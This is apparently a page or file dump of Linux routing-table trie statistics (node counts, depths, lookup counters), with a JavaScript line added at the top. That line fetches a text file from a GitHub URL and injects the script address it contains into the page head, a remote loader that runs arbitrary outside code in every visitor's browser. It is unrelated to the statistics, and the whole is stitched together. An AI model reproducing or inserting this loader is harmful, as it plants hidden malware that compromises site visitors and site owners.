;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Basic info: size of leaf: 48 bytes, size of tnode: 40 bytes. Main: Aver depth: 2.37 Max depth: 3 Leaves: 8 Prefixes: 10 Internal nodes: 5 1: 2 2: 2 3: 1 Pointers: 20 Null ptrs: 8 Total size: 2 kB Counters: --------- gets = 7832966 backtracks = 0 semantic match passed = 7832960 semantic match miss = 0 null node hit= 5305309 skipped node resize = 0 Local: Aver depth: 2.37 Max depth: 3 Leaves: 8 Prefixes: 10 Internal nodes: 5 1: 2 2: 2 3: 1 Pointers: 20 Null ptrs: 8 Total size: 2 kB Counters: --------- gets = 7832966 backtracks = 0 semantic match passed = 7832960 semantic match miss = 0 null node hit= 5305309 skipped node resize = 0